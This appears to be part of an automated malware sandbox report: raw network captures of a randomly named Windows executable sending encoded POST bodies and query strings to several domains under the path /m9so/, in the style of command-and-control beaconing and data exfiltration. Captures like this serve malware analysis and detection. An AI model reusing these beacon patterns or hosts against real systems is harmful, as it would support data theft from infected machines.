                                                                                    Mar 18, 2024 14:51:41.543358088 CET1286OUTData Raw: 37 50 30 64 5a 62 2f 70 77 68 45 54 75 58 35 2f 61 41 6e 65 34 45 63 46 73 63 2b 6e 54 33 4a 4d 77 6c 78 50 54 55 65 69 71 77 6c 64 2f 32 4c 57 6c 55 5a 57 36 52 65 33 62 68 32 4e 53 71 77 32 57 6b 2f 37 33 72 6c 46 5a 32 35 4b 4c 37 72 74 52 50
                                                                                    Data Ascii: 7P0dZb/pwhETuX5/aAne4EcFsc+nT3JMwlxPTUeiqwld/2LWlUZW6Re3bh2NSqw2Wk/73rlFZ25KL7rtRPEiRx5sWQm1+c8c5Y2NHKIEHM24O61LQ4m38zaA35Vbe9C4NJsXEwvAHwIs4/6ZUa9R0Xy2zCGxR3CRme4aFrN/sq8JO7DaJWbRgSZS7Lf+Vp6amBLBsoaUeTuGL7/JyZUPIwTRl2oBNnNIJcMq5XuD1/2fat9uRZT
                                                                                    Mar 18, 2024 14:51:41.543575048 CET7716OUTData Raw: 48 52 6e 58 70 78 37 74 67 43 53 56 65 4a 64 6f 62 57 39 43 4d 6c 76 32 58 42 41 74 6e 75 6f 46 57 6b 54 52 61 73 35 59 2b 76 2b 63 33 53 46 4d 57 73 2f 42 30 57 65 5a 41 50 72 72 6d 35 73 37 4e 57 32 6b 51 4a 4e 52 4e 76 64 46 77 49 77 70 6a 74
                                                                                    Data Ascii: HRnXpx7tgCSVeJdobW9CMlv2XBAtnuoFWkTRas5Y+v+c3SFMWs/B0WeZAPrrm5s7NW2kQJNRNvdFwIwpjtgmHCQOpTMOTIbxuQmT3MJpPfDbOrKex5yjQnaTBZCD1xgxtP7pgRF6c/rKgDoLvyDA7UbiNb91yGqCKFLeVWPrLwfq5daBmdpS2INP4TeIdDYmPopkS5c9MS+BINkD7TnSSJ3Bi2yQ9XHDloprX8XaI6HnfYnYmZ3
                                                                                    Mar 18, 2024 14:51:41.543755054 CET9002OUTData Raw: 4f 5a 42 65 47 38 44 63 4e 4f 72 49 51 42 55 6b 43 64 52 43 43 35 4a 56 46 64 4a 33 72 34 65 72 38 42 45 66 52 75 6c 4a 44 76 52 45 65 69 6b 6f 75 37 32 4e 6e 7a 5a 70 44 64 77 4f 72 49 39 5a 55 37 67 4b 51 44 63 55 51 34 53 70 4f 78 53 64 67 63
                                                                                    Data Ascii: OZBeG8DcNOrIQBUkCdRCC5JVFdJ3r4er8BEfRulJDvREeikou72NnzZpDdwOrI9ZU7gKQDcUQ4SpOxSdgcEqhQpP1WbUxEJzCO4GuY5F1gbkypTT9cUNz1p4bklOzLBKwAkDhuywdR9/DkXrX7+P4yNoWHJf38jb7M65jFunk102J9VfsYdaj6+Qi6ZK6Gml6citFpNrU9cQ8miUhJ8Ean87GOdhuaSRqbGiW6U15SAlxk+pCxn
                                                                                    Mar 18, 2024 14:51:41.543867111 CET1286OUTData Raw: 6b 66 79 36 59 43 6f 2f 6c 39 44 75 39 61 65 33 5a 48 36 4e 77 48 44 72 45 79 50 73 51 7a 4d 68 45 68 65 7a 70 51 65 58 74 37 46 69 66 67 76 63 6c 63 65 34 55 36 69 2b 51 49 2f 47 69 49 4c 6f 38 47 36 61 75 36 77 2b 52 32 37 6b 53 67 2b 6e 47 63
                                                                                    Data Ascii: kfy6YCo/l9Du9ae3ZH6NwHDrEyPsQzMhEhezpQeXt7Fifgvclce4U6i+QI/GiILo8G6au6w+R27kSg+nGcpn23ZIhjzQ2VT+z1BOL47Ugtm3V0iUz038AsLO733B3jF7swY9kACgUH67W5WG7wtN8mRMieYqN97NylMM/UdSZgpKCj4ETOmSRDc95SrksAEisHhSmK9SqFb1keFea1cJSQ1b9E8DKji/zXVhNFd9JWtf6zu3xO7
Mar 18, 2024 14:51:41.556816101 CET | 661 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 13:51:41 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 18 Mar 2024 14:51:41 GMT
                                                                                    Location: https://www.wbyzm5.buzz/m9so/
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u8OAL0l1HCPSU9c3WU91tlAb2PCHV7TKDSyzVHSGjDbJnDx7Gik4m3t1SiI3aEUWDMVu1%2BhuQbOspLetgFCnL53VPV4Lppb3nJLw9xbiar4Op1ZdJu8rabSaAuwN%2FXac7%2Fk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8665b2ec5e5042b7-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.11.20 | 49807 | 172.67.130.3 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:51:44.071964979 CET | 530 | OUT | GET /m9so/?LFPxWlV=m/+4sInKRUCBr4G0qRueLBh/JRgfrGd1CLcm3iGGUHJib9fBZO/vQs/EedckMLPR1G/2qi8YD1/iBxsP0/EJoTSgX51ucE1l7Q2MujCVII/KP9Y5kFBINaU=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.wbyzm5.buzz
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:51:44.180207014 CET | 786 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 13:51:44 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 18 Mar 2024 14:51:44 GMT
                                                                                    Location: https://www.wbyzm5.buzz/m9so/?LFPxWlV=m/+4sInKRUCBr4G0qRueLBh/JRgfrGd1CLcm3iGGUHJib9fBZO/vQs/EedckMLPR1G/2qi8YD1/iBxsP0/EJoTSgX51ucE1l7Q2MujCVII/KP9Y5kFBINaU=&OBLTJ=U4yhXH6x-jhX
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LYSUR97nEDKXUOpAQOkWC4HpdbVB4WdBdKqFTKZMCeeyPcNDK3AVjAYlOPNUY4Q9vba4jeap%2FzjcVE8oTDdULO12qo837QCSFVDG%2FQuqKeqTjsbnzN%2BxQPUvugL56Dwpsxo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8665b2fcc8e00cac-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.11.20 | 49808 | 84.32.84.32 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:51:49.684587955 CET | 790 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.feshi.store
                                                                                    Origin: http://www.feshi.store
                                                                                    Referer: http://www.feshi.store/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.11.20 | 49809 | 84.32.84.32 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:51:52.365895987 CET | 1130 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.feshi.store
                                                                                    Origin: http://www.feshi.store
                                                                                    Referer: http://www.feshi.store/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.11.20 | 49810 | 84.32.84.32 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:51:55.054939985 CET | 6430 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.feshi.store
                                                                                    Origin: http://www.feshi.store
                                                                                    Referer: http://www.feshi.store/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.11.20 | 49811 | 84.32.84.32 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:51:57.738933086 CET | 530 | OUT | GET /m9so/?LFPxWlV=1Qsa/7J+srdsR8Dz/ES5S27r13qOWkq23euP4yB+JqRfE/nsbLJ5FW7PdqHJizPjrTq31E4BOQDA72YgssNaoReb8a5kH4cRUYabd93Dw2rUjSskRvR+x9I=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.feshi.store
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:51:57.893750906 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                    Server: hcdn
                                                                                    Date: Mon, 18 Mar 2024 13:51:57 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 10066
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    x-hcdn-request-id: a2814dbb4fef06096e581d9e96da10f7-phx-edge2
                                                                                    Expires: Mon, 18 Mar 2024 13:51:56 GMT
                                                                                    Cache-Control: no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.11.20 | 49812 | 217.70.184.50 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:52:11.542639017 CET | 823 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.cyberpsychsecurity.com
                                                                                    Origin: http://www.cyberpsychsecurity.com
                                                                                    Referer: http://www.cyberpsychsecurity.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Ascii: LFPxWlV=uqHRp0w4M+2A8GmGvRXOBGmqmLw4sG+ojWKqMgef60TWUyuFO05uq3FwHyyZ3dgwKcIWGEjj8XtWr3ffOw3I6k1AZAjqS4z8K9rhaVw9hlWXh3xTDXReHw3q3oFK8WGb5QsyvKbofHLhLJ97gi5kScs4bpiRzrnB1oB8oDkUZgaPYc4wS7I3nnzjJ8CJBkgmgA==
Mar 18, 2024 14:52:11.710045099 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 13:52:11 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.11.20 | 49813 | 217.70.184.50 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:52:14.229849100 CET | 1163 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.cyberpsychsecurity.com
                                                                                    Origin: http://www.cyberpsychsecurity.com
                                                                                    Referer: http://www.cyberpsychsecurity.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:52:14.397109985 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 13:52:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.11.20 | 49814 | 217.70.184.50 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:52:16.918484926 CET | 2572 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.cyberpsychsecurity.com
                                                                                    Origin: http://www.cyberpsychsecurity.com
                                                                                    Referer: http://www.cyberpsychsecurity.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:52:17.421910048 CET | 168 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 13:52:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.11.20 | 49815 | 217.70.184.50 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:52:19.603595972 CET | 541 | OUT | GET /m9so/?LFPxWlV=jovxqEZjMvfd7zz2mTvvE1OonaQx4w6Z/02MEDusjhfET0PBGFNNsERdDgiHq90zA+FiNHbHunAjmlnnTBHWzyxLPlfgZ5XyFdT5RHsnhVfKl1JVA017Cgw=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.cyberpsychsecurity.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:52:19.772123098 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 13:52:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Vary: Accept-Language
                                                                                    Data Ascii: 7bb<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>cyberpsychsecurity.com</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=cyberpsychsecurity.com"><strong>View the WHO
                                                                                    Data Ascii: IS results of cyberpsychsecurity.com</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-borderbox_1Gwb_"><spa


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.11.20 | 49825 | 84.32.84.32 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:54:01.883178949 CET | 796 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.meliorras.com
                                                                                    Origin: http://www.meliorras.com
                                                                                    Referer: http://www.meliorras.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.11.20 | 49826 | 84.32.84.32 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:54:04.569559097 CET | 1136 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.meliorras.com
                                                                                    Origin: http://www.meliorras.com
                                                                                    Referer: http://www.meliorras.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.11.20 | 49827 | 84.32.84.32 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:54:07.242306948 CET | 2572 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.meliorras.com
                                                                                    Origin: http://www.meliorras.com
                                                                                    Referer: http://www.meliorras.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.11.20 | 49828 | 84.32.84.32 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:54:09.929078102 CET | 532 | OUT | GET /m9so/?LFPxWlV=hV0gUtH6eivuG6a1gtKJKPXk2w7TZurpdSJvAkXahnCKr3ZNP6l/DgROigVMeqNmcpawXvZwG91uaBFQ9vCDEXt4463W6r+4wKZPe4czMIeO7JeDEKZ34NE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.meliorras.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:54:10.084013939 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                    Server: hcdn
                                                                                    Date: Mon, 18 Mar 2024 13:54:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 10066
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    x-hcdn-request-id: 477fd5770c0349a2bf540f4dc00c00cc-phx-edge1
                                                                                    Expires: Mon, 18 Mar 2024 13:54:09 GMT
                                                                                    Cache-Control: no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding
                                                                                    Mar 18, 2024 14:54:10.084059954 CET1286INData Raw: 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23
                                                                                    Data Ascii: :0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weigh
                                                                                    Mar 18, 2024 14:54:10.084172010 CET1286INData Raw: 72 3a 23 63 64 63 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61
